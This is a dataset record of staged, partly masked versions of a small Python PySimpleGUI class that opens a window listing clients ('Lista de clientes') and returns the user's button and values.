        """Show the window, block until the user acts, return (button, values)."""
        self.init_components(lista_clientes)
        button, values = self.__window.Read()
        self.__window.Close()
        return button, values
|
normal
|
{
"blob_id": "624b34d160ea6db4f5249544f1614a20f506ca9e",
"index": 895,
"step-1": "<mask token>\n\n\nclass TelaLisatrClientes:\n <mask token>\n\n def init_components(self, lista_clientes):\n layout = [[sg.Text('Dados do cliente')], [sg.Listbox(values=\n lista_clientes, size=(60, 10))], [sg.Submit()]]\n self.__window = sg.Window('Lista de clientes').Layout(layout)\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass TelaLisatrClientes:\n\n def __init__(self):\n self.__window = None\n\n def init_components(self, lista_clientes):\n layout = [[sg.Text('Dados do cliente')], [sg.Listbox(values=\n lista_clientes, size=(60, 10))], [sg.Submit()]]\n self.__window = sg.Window('Lista de clientes').Layout(layout)\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass TelaLisatrClientes:\n\n def __init__(self):\n self.__window = None\n\n def init_components(self, lista_clientes):\n layout = [[sg.Text('Dados do cliente')], [sg.Listbox(values=\n lista_clientes, size=(60, 10))], [sg.Submit()]]\n self.__window = sg.Window('Lista de clientes').Layout(layout)\n\n def lista_clientes(self, lista_clientes):\n self.init_components(lista_clientes)\n button, values = self.__window.Read()\n self.__window.Close()\n return button, values\n",
"step-4": "import PySimpleGUI as sg\n\n\nclass TelaLisatrClientes:\n\n def __init__(self):\n self.__window = None\n\n def init_components(self, lista_clientes):\n layout = [[sg.Text('Dados do cliente')], [sg.Listbox(values=\n lista_clientes, size=(60, 10))], [sg.Submit()]]\n self.__window = sg.Window('Lista de clientes').Layout(layout)\n\n def lista_clientes(self, lista_clientes):\n self.init_components(lista_clientes)\n button, values = self.__window.Read()\n self.__window.Close()\n return button, values\n",
"step-5": "import PySimpleGUI as sg\n\nclass TelaLisatrClientes():\n\n def __init__(self):\n self.__window = None\n\n def init_components(self, lista_clientes):\n\n layout = [\n [sg.Text('Dados do cliente')],\n [sg.Listbox(values=lista_clientes, size=(60, 10))],\n [sg.Submit()]\n ]\n\n self.__window = sg.Window('Lista de clientes').Layout(layout)\n\n def lista_clientes(self, lista_clientes):\n\n self.init_components(lista_clientes)\n\n button, values = self.__window.Read()\n\n self.__window.Close()\n\n return button, values\n\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.